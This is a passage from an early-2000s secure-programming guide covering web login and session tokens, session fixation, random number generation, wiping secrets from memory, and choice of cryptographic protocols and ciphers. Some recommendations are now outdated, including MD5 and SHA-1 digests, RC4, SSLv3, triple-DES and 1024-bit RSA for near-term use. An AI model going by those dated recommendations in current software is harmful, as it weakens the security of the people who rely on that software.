many practical problems with actually using them (e.g., web browsers don't
support a single user certificate format and users find it difficult to
install them). You can learn about how to set up digital certificates from
many places, e.g., [http://www.petbrain.com/modules.php?op=modload&name=pki&
file=index] Petbrain. Using Java or Javascript has its own problems, since
many users disable them, some firewalls filter them out, and they tend to be
slow. In most cases, requiring every user to install a plug-in is impractical
too, though if the system is only for an intranet for a relatively small
number of users this may be appropriate.

If you're building an intranet application, you should generally use whatever
authentication system is used by your users. Unix-like systems tend to use
Kerberos, NIS+, or LDAP. You may also need to deal with a Windows-based
authentication schemes (which can be viewed as proprietary variants of
Kerberos and LDAP). Thus, if your organization depend on Kerberos, design
your system to use Kerberos. Try to separate the authentication system from
the rest of your application, since the organization may (will!) change their
authentication system over time.

Many techniques don't work or don't work very well. One approach that works
in some cases is to use ``basic authentication'', which is built into
essentially all browsers and servers. Unfortunately, basic authentication
sends passwords unencrypted, so it makes passwords easy to steal; basic
authentication by itself is really useful only for worthless information. You
could store authentication information in the URLs selected by the users, but
for most circumstances you should never do this - not only are the URLs sent
unprotected over the wire (as with basic authentication), but there are too
many other ways that this information can leak to others (e.g., through the
browser history logs stored by many browsers, logs of proxies, and to other
web sites through the Referer: field). You could wrap all communication with
a web server using an SSL/TLS connection (which would encrypt it); this is
secure (depending on how you do it), and it's necessary if you have important
data, but note that this is costly in terms of performance. You could also
use ``digest authentication'', which exposes the communication but at least
authenticates the user without exposing the underlying password used to
authenticate the user. Digest authentication is intended to be a simple
partial solution for low-value communications, but digest authentication is
not widely supported in an interoperable way by web browsers and servers. In
fact, as noted in a March 18, 2002 eWeek article, Microsoft's web client
(Internet Explorer) and web server (IIS) incorrectly implement the standard
(RFC 2617), and thus won't work with other servers or browsers. Since
Microsoft don't view this incorrect implementation as a serious problem, it
will be a very long time before most of their customers have a
correctly-working program.

Thus, the most common technique for authenticating on the web today is
through cookies. Cookies weren't really designed for this purpose, but they
can be used for authentication - but there are many wrong ways to use them
that create security vulnerabilities, so be careful. For more information
about cookies, see IETF RFC 2965, along with the older specifications about
them. Note that to use cookies, some browsers (e.g., Microsoft Internet
Explorer 6) may insist that you have a privacy profile (named p3p.xml on the
root directory of the server).

Note that some users don't accept cookies, so this solution still has some
problems. If you want to support these users, you should send this
authentication information back and forth via HTML form hidden fields (since
nearly all browsers support them without concern). You'd use the same
approach as with cookies - you'd just use a different technology to have the
data sent from the user to the server. Naturally, if you implement this
approach, you need to include settings to ensure that these pages aren't
cached for use by others. However, while I think avoiding cookies is
preferable, in practice these other approaches often require much more
development effort. Since it's so hard to implement this on a large scale for
many application developers, I'm not currently stressing these approaches. I
would rather describe an approach that is reasonably secure and reasonably
easy to implement, than emphasize approaches that are too hard to implement
correctly (by either developers or users). However, if you can do so without
much effort, by all means support sending the authentication information
using form hidden fields and an encrypted link (e.g., SSL/TLS). As with all
cookies, for these cookies you should turn on the HttpOnly flag unless you
have a web browser script that must be able to read the cookie.

Fu [2001] discusses client authentication on the web, along with a suggested
approach, and this is the approach I suggest for most sites. The basic idea
is that client authentication is split into two parts, a ``login procedure''
and ``subsequent requests.'' In the login procedure, the server asks for the
user's username and password, the user provides them, and the server replies
with an ``authentication token''. In the subsequent requests, the client (web
browser) sends the authentication token to the server (along with its
request); the server verifies that the token is valid, and if it is, services
the request. Another good source of information about web authentication is
Seifried [2001].

One serious problem with some web authentication techniques is that they are
vulnerable to a problem called "session fixation". In a session fixation
attack, the attacker fixes the user's session ID before the user even logs
into the target server, thus eliminating the need to obtain the user's
session ID afterwards. Basically, the attacker obtains an account, and then
tricks another user into using the attacker's account - often by creating a
special hypertext link and tricking the user into clicking on it. A good
paper describing session fixation is the paper by [http://www.acros.si/papers
/session_fixation.pdf] Mitja Kolsek [2002]. A web authentication system you
use should be resistant to session fixation.
-----------------------------------------------------------------------------

11.2.1. Authenticating on the Web: Logging In

The login procedure is typically implemented as an HTML form; I suggest using
the field names ``username'' and ``password'' so that web browsers can
automatically perform some useful actions. Make sure that the password is
sent over an encrypted connection (using SSL or TLS, through an https:
connection) - otherwise, eavesdroppers could collect the password. Make sure
all password text fields are marked as passwords in the HTML, so that the
password text is not visible to anyone who can see the user's screen.

If both the username and password fields are filled in, do not try to
automatically log in as that user. Instead, display the login form with the
user and password fields; this lets the user verify that they really want to
log in as that user. If you fail to do this, attackers will be able to
exploit this weakness to perform a session fixation attack. Paranoid systems
might want simply ignore the password field and make the user fill it in, but
this interferes with browsers which can store passwords for users.

When the user sends username and password, it must be checked against the
user account database. This database shouldn't store the passwords ``in the
clear'', since if someone got a copy of the this database they'd suddenly get
everyone's password (and users often reuse passwords). Some use crypt() to
handle this, but crypt can only handle a small input, so I recommend using a
different approach (this is my approach - Fu [2001] doesn't discuss this).
Instead, the user database should store a username, salt, and the password
hash for that user. The ``salt'' is just a random sequence of characters,
used to make it harder for attackers to determine a password even if they get
the password database - I suggest an 8-character random sequence. It doesn't
need to be cryptographically random, just different from other users. The
password hash should be computed by concatenating ``server key1'', the user's
password, and the salt, and then running a cryptographically secure hash
algorithm. Server key1 is a secret key unique to this server - keep it
separate from the password database. Someone who has server key1 could then
run programs to crack user passwords if they also had the password database;
since it doesn't need to be memorized, it can be a long and complex password.
Most secure would be HMAC-SHA-1 or HMAC-MD5; you could use SHA-1 (most web
sites aren't really worried about the attacks it allows) or MD5 (but MD5
would be poorer choice; see the discussion about MD5).

Thus, when users create their accounts, the password is hashed and placed in
the password database. When users try to log in, the purported password is
hashed and compared against the hash in the database (they must be equal).
When users change their password, they should type in both the old and new
password, and the new password twice (to make sure they didn't mistype it);
and again, make sure none of these password's characters are visible on the
screen.

By default, don't save the passwords themselves on the client's web browser
using cookies - users may sometimes use shared clients (say at some coffee
shop). If you want, you can give users the option of ``saving the password''
on their browser, but if you do, make sure that the password is set to only
be transmitted on ``secure'' connections, and make sure the user has to
specifically request it (don't do this by default).

Make sure that the page is marked to not be cached, or a proxy server might
re-serve that page to other users.

Once a user successfully logs in, the server needs to send the client an
``authentication token'' in a cookie, which is described next.
-----------------------------------------------------------------------------

11.2.2. Authenticating on the Web: Subsequent Actions

Once a user logs in, the server sends back to the client a cookie with an
authentication token that will be used from then on. A separate
authentication token is used, so that users don't need to keep logging in, so
that passwords aren't continually sent back and forth, and so that
unencrypted communication can be used if desired. A suggested token (ignoring
session fixation attacks) would look like this:
  exp=t&data=s&digest=m
Where t is the expiration time of the token (say, in several hours), and data
s identifies the user (say, the user name or session id). The digest is a
keyed digest of the other fields. Feel free to change the field name of
``data'' to be more descriptive (e.g., username and/or sessionid). If you
have more than one field of data (e.g., both a username and a sessionid),
make sure the digest uses both the field names and data values of all fields
you're authenticating; concatenate them with a pattern (say ``%%'', ``+'', or
``&'') that can't occur in any of the field data values. As described in a
moment, it would be a good idea to include a username. The keyed digest
should be a cryptographic hash of the other information in the token, keyed
using a different server key2. The keyed digest should use HMAC-MD5 or
HMAC-SHA1, using a different server key (key2), though simply using SHA1
might be okay for some purposes (or even MD5, if the risks are low). Key2 is
subject to brute force guessing attacks, so it should be long (say 12+
characters) and unguessable; it does NOT need to be easily remembered. If
this key2 is compromised, anyone can authenticate to the server, but it's
easy to change key2 - when you do, it'll simply force currently ``logged in''
users to re-authenticate. See Fu [2001] for more details.

There is a potential weakness in this approach. I have concerns that Fu's
approach, as originally described, is weak against session fixation attacks
(from several different directions, which I don't want to get into here).
Thus, I now suggest modifying Fu's approach and using this token format
instead:
  exp=t&data=s&client=c&digest=m
This is the same as the original Fu aproach, and older versions of this book
(before December 2002) didn't suggest it. This modification adds a new
"client" field to uniquely identify the client's current location/identity.
The data in the client field should be something that should change if
someone else tries to use the account; ideally, its new value should be
unguessable, though that's hard to accomplish in practice. Ideally the client
field would be the client's SSL client certificate, but currently that's a
suggest that is hard to meet. At the least, it should be the user's IP
address (as perceived from the server, and remember to plan for IPv6's longer
addresses). This modification doesn't completely counter session fixation
attacks, unfortunately (since if an attacker can determine what the user
would send, the attacker may be able to make a request to a server and
convince the client to accept those values). However, it does add resistance
to the attack. Again, the digest must now include all the other data.

Here's an example. If a user logs into foobar.com sucessfully, you might
establish the expiration date as 2002-12-30T1800 (let's assume we'll transmit
as ASCII text in this format for the moment), the username as "fred", the
client session as "1234", and you might determine that the client's IP
address was 5.6.7.8. If you use a simple SHA-1 keyed digest (and use a key
prefixing the rest of the data), with the server key2 value of "rM!V^m~v*
Dzx", the digest could be computed over:
 exp=2002-12-30T1800&user=fred&session=1234&client=5.6.7.8
A keyed digest can be computed by running a cryptographic hash code over,
say, the server key2, then the data; in this case, the digest would be:
101cebfcc6ff86bc483e0538f616e9f5e9894d94

From then on, the server must check the expiration time and recompute the
digest of this authentication token, and only accept client requests if the
digest is correct. If there's no token, the server should reply with the user
login page (with a hidden form field to show where the successful login
should go afterwards).

It would be prudent to display the username, especially on important screens,
to help counter session fixation attacks. If users are given feedback on
their username, they may notice if they don't have their expected username.
This is helpful anyway if it's possible to have an unexpected username (e.g.,
a family that shares the same machine). Examples of important screens include
those when a file is uploaded that should be kept private.

One odd implementation issue: although the specifications for the "Expires:"
(expiration time) field for cookies permit time zones, it turns out that some
versions of Microsoft's Internet Explorer don't implement time zones
correctly for cookie expiration. Thus, you need to always use UTC time (also
called Zulu time) in cookie expiration times for maximum portability. It's a
good idea in general to use UTC time for time values, and convert when
necessary for human display, since this eliminates other time zone and
daylight savings time issues.

If you include a sessionid in the authentication token, you can limit access
further. Your server could ``track'' what pages a user has seen in a given
session, and only permit access to other appropriate pages from that point
(e.g., only those directly linked from those page(s)). For example, if a user
is granted access to page foo.html, and page foo.html has pointers to
resources bar1.jpg and bar2.png, then accesses to bar4.cgi can be rejected.
You could even kill the session, though only do this if the authentication
information is valid (otherwise, this would make it possible for attackers to
cause denial-of-service attacks on other users). This would somewhat limit
the access an attacker has, even if they successfully hijack a session,
though clearly an attacker with time and an authentication token could
``walk'' the links just as a normal user would.

One decision is whether or not to require the authentication token and/or
data to be sent over a secure connection (e.g., SSL). If you send an
authentication token in the clear (non-secure), someone who intercepts the
token could do whatever the user could do until the expiration time. Also,
when you send data over an unencrypted link, there's the risk of unnoticed
change by an attacker; if you're worried that someone might change the data
on the way, then you need to authenticate the data being transmitted.
Encryption by itself doesn't guarantee authentication, but it does make
corruption more likely to be detected, and typical libraries can support both
encryption and authentication in a TLS/SSL connection. In general, if you're
encrypting a message, you should also authenticate it. If your needs vary,
one alternative is to create two authentication tokens - one is used only in
a ``secure'' connection for important operations, while the other used for
less-critical operations. Make sure the token used for ``secure'' connections
is marked so that only secure connections (typically encrypted SSL/TLS
connections) are used. If users aren't really different, the authentication
token could omit the ``data'' entirely.

Again, make sure that the pages with this authentication token aren't cached.
There are other reasonable schemes also; the goal of this text is to provide
at least one secure solution. Many variations are possible.
-----------------------------------------------------------------------------

11.2.3. Authenticating on the Web: Logging Out

You should always provide users with a mechanism to ``log out'' - this is
especially helpful for customers using shared browsers (say at a library).
Your ``logout'' routine's task is simple - just unset the client's
authentication token.
-----------------------------------------------------------------------------

11.3. Random Numbers

In many cases secure programs must generate ``random'' numbers that cannot be
guessed by an adversary. Examples include session keys, public or private
keys, symmetric keys, nonces and IVs used in many protocols, salts, and so
on. Ideally, you should use a truly random source of data for random numbers,
such as values based on radioactive decay (through precise timing of Geiger
counter clicks), atmospheric noise, or thermal noise in electrical circuits.
Some computers have a hardware component that functions as a real random
value generator, and if it's available you should use it.

However, most computers don't have hardware that generates truly random
values, so in most cases you need a way to generate random numbers that is
sufficiently random that an adversary can't predict it. In general, this
means that you'll need three things:

<A0><A0>*<2A>An ``unguessable'' state; typically this is done by measuring variances
    in timing of low-level devices (keystrokes, disk drive arm jitter, etc.)
    in a way that an adversary cannot control.

<A0><A0>*<2A>A cryptographically strong pseudo-random number generator (PRNG), which
    uses the state to generate ``random'' numbers.

<A0><A0>*<2A>A large number of bits (in both the seed and the resulting value used).
    There's no point in having a strong PRNG if you only have a few possible
    values, because this makes it easy for an attacker to use brute force
    attacks. The number of bits necessary varies depending on the
    circumstance, however, since these are often used as cryptographic keys,
    the normal rules of thumb for keys apply. For a symmetric key (result),
    I'd use at least 112 bits (3DES), 128 bits is a little better, and 160
    bits or more is even safer.


Typically the PRNG uses the state to generate some values, and then some of
its values and other unguessable inputs are used to update the state. There
are lots of ways to attack these systems. For example, if an attacker can
control or view inputs to the state (or parts of it), the attacker may be
able to determine your supposedly ``random'' number.

A real danger with PRNGs is that most computer language libraries include a
large set of pseudo-random number generators (PRNGs) which are inappropriate
for security purposes. Let me say it again: do not use typical random number
generators for security purposes. Typical library PRNGs are intended for use
in simulations, games, and so on; they are not sufficiently random for use in
security functions such as key generation. Most non-cryptographic library
PRNGs are some variation of ``linear congruential generators'', where the
``next'' random value is computed as "(aX+b)<29>mod<6F>m" (where X is the previous
value). Good linear congruential generators are fast and have useful
statistical properties, making them appropriate for their intended uses. The
problem with such PRNGs is that future values can be easily deduced by an
attacker (though they may appear random). Other algorithms for generating
random numbers quickly, such as quadratic generators and cubic generators,
have also been broken [Schneier 1996]. In short, you have to use
cryptographically strong PRNGs to generate random numbers in secure
applications - ordinary random number libraries are not sufficient.

Failing to correctly generate truly random values for keys has caused a
number of problems, including holes in Kerberos, the X window system, and NFS
[Venema 1996].

If possible, you should use system services (typically provided by the
operating system) that are expressly designed to create cryptographically
secure random values. For example, the Linux kernel (since 1.3.30) includes a
random number generator, which is sufficient for many security purposes. This
random number generator gathers environmental noise from device drivers and
other sources into an entropy pool. When accessed as /dev/random, random
bytes are only returned within the estimated number of bits of noise in the
entropy pool (when the entropy pool is empty, the call blocks until
additional environmental noise is gathered). When accessed as /dev/urandom,
as many bytes as are requested are returned even when the entropy pool is
exhausted. If you are using the random values for cryptographic purposes
(e.g., to generate a key) on Linux, use /dev/random. *BSD systems also
include /dev/random. Solaris users with the SUNWski package also have /dev/
random. Note that if a hardware random number generator is available and its
driver is installed, it will be used instead. More information is available
in the system documentation random(4).

On other systems, you'll need to find another way to get truly random
results. One possibility for other Unix-like systems is the Entropy Gathering
Daemon (EGD), which monitors system activity and hashes it into random
values; you can get it at [http://www.lothar.com/tech/crypto] http://
www.lothar.com/tech/crypto. You might consider using a cryptographic hash
functions (e.g., SHA-1) on PRNG outputs. By using a hash algorithm, even if
the PRNG turns out to be guessable, this means that the attacker must now
also break the hash function.

If you have to implement a strong PRNG yourself, a good choice for a
cryptographically strong (and patent-unencumbered) PRNG is the Yarrow
algorithm; you can learn more about Yarrow from [http://www.counterpane.com/
yarrow.html] http://www.counterpane.com/yarrow.html. Some other PRNGs can be
useful, but many widely-used ones have known weaknesses that may or may not
matter depending on your application. Before implementing a PRNG yourself,
consult the literature, such as [Kelsey 1998] and [McGraw 2000a]. You should
also examine [http://www.ietf.org/rfc/rfc1750.txt] IETF RFC 1750. NIST has
some useful information; see the [http://csrc.nist.gov/publications/nistpubs/
800-22/sp-800-22-051501.pdf] NIST publication 800-22 and [http://
csrc.nist.gov/publications/nistpubs/800-22/errata-sheet.pdf] NIST errata. You
should know about the [http://stat.fsu.edu/~geo/diehard.html] diehard tests
too. You might want to examine the paper titled "how Intel checked its PRNG",
but unfortunately that paper appears to be unavailable now.
-----------------------------------------------------------------------------

11.4. Specially Protect Secrets (Passwords and Keys) in User Memory

If your application must handle passwords or non-public keys (such as session
keys, private keys, or secret keys), try to hide them and overwrite them
immediately after using them so they have minimal exposure.

Systems such as Linux support the mlock() and mlockall() calls to keep memory
from being paged to disk (since someone might acquire the kep later from the
swap file). Note that on Linux this is a privileged system call, which causes
its own issues (do I grant the program superuser privileges so it can call
mlock, if it doesn't need them otherwise?).

Also, if your program handles such secret values, be sure to disable creating
core dumps (via ulimit). Otherwise, an attacker may be able to halt the
program and find the secret value in the data dump.

Beware - normally processes can monitor other processes through the calls for
debuggers (e.g., via ptrace(2) and the /proc pseudo-filesystem) [Venema 1996]
Kernels usually protect against these monitoring routines if the process is
setuid or setgid (on the few ancient ones that don't, there really isn't a
good way to defend yourself other than upgrading). Thus, if your process
manages secret values, you probably should make it setgid or setuid (to a
different unprivileged group or user) to forceably inhibit this kind of
monitoring. Unless you need it to be setuid, use setgid (since this grants
fewer privileges).

Then there's the problem of being able to actually overwrite the value, which
often becomes language and compiler specific. In many languages, you need to
make sure that you store such information in mutable locations, and then
overwrite those locations. For example, in Java, don't use the type String to
store a password because Strings are immutable (they will not be overwritten
until garbage-collected and then reused, possibly a far time in the future).
Instead, in Java use char[] to store a password, so it can be immediately
overwritten. In Ada, use type String (an array of characters), and not type
Unbounded_String, to make sure that you have control over the contents.

In many languages (including C and C++), be careful that the compiler doesn't
optimize away the "dead code" for overwriting the value - since in this case
it's not dead code. Many compilers, including many C/C++ compilers, remove
writes to stores that are no longer used - this is often referred to as "dead
store removal." Unfortunately, if the write is really to overwrite the value
of a secret, this means that code that appears to be correct will be silently
discareded. Ada provides the pragma Inspection_Point; place this after the
code erasing the memory, and that way you can be certain that the object
containing the secret will really be erased (and that the the overwriting
won't be optimized away).

A Bugtraq post by Andy Polyakov (November 7, 2002) reported that the C/C++
compilers gcc version 3 or higher, SGI MIPSpro, and the Microsoft compilers
eliminated simple inlined calls to memset intended to overwrite secrets. This
is allowed by the C and C++ standards. Other C/C++ compilers (such as gcc
less than version 3) preserved the inlined call to memset at all optimization
levels, showing that the issue is compiler-specific. Simply declaring that
the destination data is volatile doesn't help on all compilers; both the
MIPSpro and Microsoft compilers ignored simple "volatilization". Simply
"touching" the first byte of the secret data doesn't help either; he found
that the MIPSpro and GCC>=3 cleverly nullify only the first byte and leave
the rest intact (which is actually quite clever - the problem is that the
compiler's cleverness is interfering with our goals). One approach that seems
to work on all platforms is to write your own implementation of memset with
internal "volatilization" of the first argument (this code is based on a
[http://online.securityfocus.com/archive/82/298061/2002-10-27/2002-11-02/0]
workaround proposed by Michael Howard):
 void *guaranteed_memset(void *v,int c,size_t n)
  { volatile char *p=v; while (n--) *p++=c; return v; }
Then place this definition into an external file to force the function to be
external (define the function in a corresponding .h file, and #include the
file in the callers, as is usual). This approach appears to be safe at any
optimization level (even if the function gets inlined).
-----------------------------------------------------------------------------

11.5. Cryptographic Algorithms and Protocols

Often cryptographic algorithms and protocols are necessary to keep a system
secure, particularly when communicating through an untrusted network such as
the Internet. Where possible, use cryptographic techniques to authenticate
information and keep the information private (but don't assume that simple
encryption automatically authenticates as well). Generally you'll need to use
a suite of available tools to secure your application.

For background information and code, you should probably look at the classic
text ``Applied Cryptography'' [Schneier 1996]. The newsgroup ``sci.crypt''
has a series of FAQ's; you can find them at many locations, including [http:/
/www.landfield.com/faqs/cryptography-faq] http://www.landfield.com/faqs/
cryptography-faq. Linux-specific resources include the Linux Encryption HOWTO
at [http://marc.mutz.com/Encryption-HOWTO/] http://marc.mutz.com/
Encryption-HOWTO/. A discussion on how protocols use the basic algorithms can
be found in [Opplinger 1998]. A useful collection of papers on how to apply
cryptography in protocols can be found in [Stallings 1996]. What follows here
is just a few comments; these areas are rather specialized and covered more
thoroughly elsewhere.

Cryptographic protocols and algorithms are difficult to get right, so do not
create your own. Instead, where you can, use protocols and algorithms that
are widely-used, heavily analyzed, and accepted as secure. When you must
create anything, give the approach wide public review and make sure that
professional security analysts examine it for problems. In particular, do not
create your own encryption algorithms unless you are an expert in cryptology,
know what you're doing, and plan to spend years in professional review of the
algorithm. Creating encryption algorithms (that are any good) is a task for
experts only.

A number of algorithms are patented; even if the owners permit ``free use''
at the moment, without a signed contract they can always change their minds
later, putting you at extreme risk later. In general, avoid all patented
algorithms - in most cases there's an unpatented approach that is at least as
good or better technically, and by doing so you avoid a large number of legal
problems.

Another complication is that many counties regulate or restrict cryptography
in some way. A survey of legal issues is available at the ``Crypto Law
Survey'' site, [http://rechten.kub.nl/koops/cryptolaw/] http://rechten.kub.nl
/koops/cryptolaw/.

Often, your software should provide a way to reject ``too small'' keys, and
let the user set what ``too small'' is. For RSA keys, 512 bits is too small
for use. There is increasing evidence that 1024 bits for RSA keys is not
enough either; Bernstein has suggested techniques that simplify brute-forcing
RSA, and other work based on it (such as Shamir and Tromer's "Factoring Large
Numbers with the TWIRL device") now suggests that 1024 bit keys can be broken
in a year by a $10 Million device. You may want to make 2048 bits the minimum
for RSA if you really want a secure system, and you should certainly do so if
you plan to use those keys after 2015. For more about RSA specifically, see
RSA's commentary on Bernstein's work. For a more general discussion of key
length and other general cryptographic algorithm issues, see [http://
csrc.nist.gov/encryption/kms/key-management-guideline-(workshop).pdf] NIST's
key management workshop in November 2001.
-----------------------------------------------------------------------------

11.5.1. Cryptographic Protocols

When you need a security protocol, try to use standard-conforming protocols
such as IPSec, SSL (soon to be TLS), SSH, S/MIME, OpenPGP/GnuPG/PGP, and
Kerberos. Each has advantages and disadvantages; many of them overlap
somewhat in functionality, but each tends to be used in different areas:

<A0><A0>*<2A>Internet Protocol Security (IPSec). IPSec provides encryption and/or
    authentication at the IP packet level. However, IPSec is often used in a
    way that only guarantees authenticity of two communicating hosts, not of
    the users. As a practical matter, IPSec usually requires low-level
    support from the operating system (which not all implement) and an
    additional keyring server that must be configured. Since IPSec can be
    used as a "tunnel" to secure packets belonging to multiple users and
    multiple hosts, it is especially useful for building a Virtual Private
    Network (VPN) and connecting a remote machine. As of this time, it is
    much less often used to secure communication from individual clients to
    servers. The new version of the Internet Protocol, IPv6, comes with IPSec
    ``built in,'' but IPSec also works with the more common IPv4 protocol.
    Note that if you use IPSec, don't use the encryption mode without the
    authentication, because the authentication also acts as integrity
    protection.

<A0><A0>*<2A>Secure Socket Layer (SSL) / TLS. SSL/TLS works over TCP and tunnels other
    protocols using TCP, adding encryption, authentication of the server, and
    optional authentication of the client (but authenticating clients using
    SSL/TLS requires that clients have configured X.509 client certificates,
    something rarely done). SSL version 3 is widely used; TLS is a later
    adjustment to SSL that strengthens its security and improves its
    flexibility. Currently there is a slow transition going on from SSLv3 to
    TLS, aided because implementations can easily try to use TLS and then
    back off to SSLv3 without user intervention. Unfortunately, a few bad
    SSLv3 implementations cause problems with the backoff, so you may need a
    preferences setting to allow users to skip using TLS if necessary. Don't
    use SSL version 2, it has some serious security weaknesses.

    SSL/TLS is the primary method for protecting http (web) transactions. Any
    time you use an "https://" URL, you're using SSL/TLS. Other protocols
    that often use SSL/TLS include POP3 and IMAP. SSL/TLS usually use a
    separate TCP/IP port number from the unsecured port, which the IETF is a
    little unhappy about (because it consumes twice as many ports; there are
    solutions to this). SSL is relatively easy to use in programs, because
    most library implementations allow programmers to use operations similar
    to the operations on standard sockets like SSL_connect(), SSL_write(),
    SSL_read(), etc. A widely used OSS/FS implementation of SSL (as well as
    other capabilities) is OpenSSL, available at [http://www.openssl.org]
    http://www.openssl.org.

<A0><A0>*<2A>OpenPGP and S/MIME. There are two competing, essentially incompatible
    standards for securing email: OpenPGP and S/MIME. OpenPHP is based on the
    PGP application; an OSS/FS implementation is GNU Privacy Guard from
    [http://www.gnupg.org] http://www.gnupg.org. Currently, their
    certificates are often not interchangeable; work is ongoing to repair
    this.

<A0><A0>*<2A>SSH. SSH is the primary method of securing ``remote terminals'' over an
    internet, and it also includes methods for tunelling X Windows sessions.
    However, it's been extended to support single sign-on and general secure
    tunelling for TCP streams, so it's often used for securing other data
    streams too (such as CVS accesses). The most popular implementation of
    SSH is OpenSSH [http://www.openssh.com] http://www.openssh.com, which is
    OSS/FS. Typical uses of SSH allows the client to authenticate that the
    server is truly the server, and then the user enters a password to
    authenticate the user (the password is encrypted and sent to the other
    system for verification). Current versions of SSH can store private keys,
    allowing users to not enter the password each time. To prevent
    man-in-the-middle attacks, SSH records keying information about servers
    it talks to; that means that typical use of SSH is vulnerable to a
    man-in-the-middle attack during the very first connection, but it can
    detect problems afterwards. In contrast, SSL generally uses a certificate
    authority, which eliminates the first connection problem but requires
    special setup (and payment!) to the certificate authority.

<A0><A0>*<2A>Kerberos. Kerberos is a protocol for single sign-on and authenticating
    users against a central authentication and key distribution server.
    Kerberos works by giving authenticated users "tickets", granting them
    access to various services on the network. When clients then contact
    servers, the servers can verify the tickets. Kerberos is a primary method
    for securing and supporting authentication on a LAN, and for establishing
    shared secrets (thus, it needs to be used with other algorithms for the
    actual protection of communication). Note that to use Kerberos, both the
    client and server have to include code to use it, and since not everyone
    has a Kerberos setup, this has to be optional - complicating the use of
    Kerberos in some programs. However, Kerberos is widely used.


Many of these protocols allow you to select a number of different algorithms,
so you'll still need to pick reasonable defaults for algorithms (e.g., for
encryption).
-----------------------------------------------------------------------------

11.5.2. Symmetric Key Encryption Algorithms

The use, export, and/or import of implementations of encryption algorithms
are restricted in many countries, and the laws can change quite rapidly. Find
out what the rules are before trying to build applications using
cryptography.

For secret key (bulk data) encryption algorithms, use only encryption
algorithms that have been openly published and withstood years of attack, and
check on their patent status. I would recommend using the new Advanced
Encryption Standard (AES), also known as Rijndahl -- a number of
cryptographers have analyzed it and not found any serious weakness in it, and
I believe it has been through enough analysis to be trustworthy now. However,
in August 2002 researchers Fuller and Millar discovered a mathematical
property of the cipher that, while not an attack, might be exploitable into
an attack (the approach may actually has serious consequences for some other
algorithms, too). Thus, it's worth staying tuned to future work. A good
alternative to AES is the Serpent algorithm, which is slightly slower but is
very resistant to attack. For many applications triple-DES is a very good
encryption algorithm; it has a reasonably lengthy key (112 bits), no patent
issues, and a very long history of withstanding attacks (it's withstood
attacks far longer than any other encryption algorithm with reasonable key
length in the public literature, so it's probably the safest
publicly-available symmetric encryption algorithm when properly implemented).
However, triple-DES is very slow when implemented in software, so triple-DES
can be considered ``safest but slowest.'' Twofish appears to be a good
encryption algorithm, but there are some lingering questions - Sean Murphy
and Fauzan Mirza showed that Twofish has properties that cause many academics
to be concerned (though as of yet no one has managed to exploit these
properties). MARS is highly resistent to ``new and novel'' attacks, but it's
more complex and is impractical on small-ability smartcards. For the moment I
would avoid Twofish - it's quite likely that this will never be exploitable,
but it's hard to be sure and there are alternative algorithms which don't
have these concerns. Don't use IDEA - it's subject to U.S. and European
patents. Don't use stupid algorithms such as XOR with a constant or constant
string, the ROT (rotation) scheme, a Vinegere ciphers, and so on - these can
be trivially broken with today's computers. Don't use ``double DES'' (using
DES twice) - that's subject to a ``man in the middle'' attack that triple-DES
avoids. Your protocol should support multiple encryption algorithms, anyway;
that way, when an encryption algorithm is broken, users can switch to another
one.

For symmetric-key encryption (e.g., for bulk encryption), don't use a key
length less than 90 bits if you want the information to stay secret through
2016 (add another bit for every additional 18 months of security) [Blaze
1996]. For encrypting worthless data, the old DES algorithm has some value,
but with modern hardware it's too easy to break DES's 56-bit key using brute
force. If you're using DES, don't just use the ASCII text key as the key -
parity is in the least (not most) significant bit, so most DES algorithms
will encrypt using a key value well-known to adversaries; instead, create a
hash of the key and set the parity bits correctly (and pay attention to error
reports from your encryption routine). So-called ``exportable'' encryption
algorithms only have effective key lengths of 40 bits, and are essentially
worthless; in 1996 an attacker could spend $10,000 to break such keys in
twelve minutes or use idle computer time to break them in a few days, with
the time-to-break halving every 18 months in either case.

Block encryption algorithms can be used in a number of different modes, such
as ``electronic code book'' (ECB) and ``cipher block chaining'' (CBC). In
nearly all cases, use CBC, and do not use ECB mode - in ECB mode, the same
block of data always returns the same result inside a stream, and this is
often enough to reveal what's encrypted. Many modes, including CBC mode,
require an ``initialization vector'' (IV). The IV doesn't need to be secret,
but it does need to be unpredictable by an attacker. Don't reuse IV's across
sessions - use a new IV each time you start a session.

There are a number of different streaming encryption algorithms, but many of
them have patent restrictions. I know of no patent or technical issues with
WAKE. RC4 was a trade secret of RSA Data Security Inc; it's been leaked
since, and I know of no real legal impediment to its use, but RSA Data
Security has often threatened court action against users of it (it's not at
all clear what RSA Data Security could do, but no doubt they could tie up
users in worthless court cases). If you use RC4, use it as intended - in
particular, always discard the first 256 bytes it generates, or you'll be
vulnerable to attack. SEAL is patented by IBM - so don't use it. SOBER is
patented; the patent owner has claimed that it will allow many uses for free
if permission is requested, but this creates an impediment for later use.
Even more interestingly, block encryption algorithms can be used in modes
that turn them into stream ciphers, and users who want stream ciphers should
consider this approach (you'll be able to choose between far more
publicly-available algorithms).
-----------------------------------------------------------------------------

11.5.3. Public Key Algorithms

For public key cryptography (used, among other things, for signing and
sending secret keys), there are only a few widely-deployed algorithms. One of
the most widely-used algorithms is RSA; RSA's algorithm was patented, but
only in the U.S., and that patent expired in September 2000, so RSA can be
freely used. Never decrypt or sign a raw value that an attacker gives you
directly using RSA and expose the result, because that could expose the
private key (this isn't a problem in practice, because most protocols involve
signing a hash computed by the user - not the raw value - or don't expose the
result). Never decrypt or sign the exact same raw value multiple times (the
original can be exposed). Both of these can be solved by always adding random
padding (PGP does this) - the usual approach is called Optimal Asymmetric
Encryption Padding (OAEP).

The Diffie-Hellman key exchange algorithm is widely used to permit two
parties to agree on a session key. By itself it doesn't guarantee that the
parties are who they say they are, or that there is no middleman, but it does
strongly help defend against passive listeners; its patent expired in 1997.
If you use Diffie-Hellman to create a shared secret, be sure to hash it first
(there's an attack if you use its shared value directly).

NIST developed the digital signature standard (DSS) (it's a modification of
the ElGamal cryptosystem) for digital signature generation and verification;
one of the conditions for its development was for it to be patent-free.

RSA, Diffie-Hellman, and El Gamal's techniques require more bits for the keys
for equivalent security compared to typical symmetric keys; a 1024-bit key in
these systems is supposed to be roughly equivalent to an 80-bit symmetric
key. A 512-bit RSA key is considered completely unsafe; Nicko van Someren has
demonstrated that such small RSA keys can be factored in 6 weeks using only
already-available office hardware (never mind equipment designed for the
job). In the past, a 1024-bit RSA key was considered reasonably secure, but
recent advancements in factorization algorithms (e.g., by D. J. Bernstein)
have raised concerns that perhaps even 1024 bits is not enough for an RSA
key. Certainly, if your application needs to be highly secure or last beyond
2015, you should use a 2048 bit keys.

If you need a public key that requires far fewer bits (e.g., for a
smartcard), then you might use elliptic curve cryptography (IEEE P1363 has
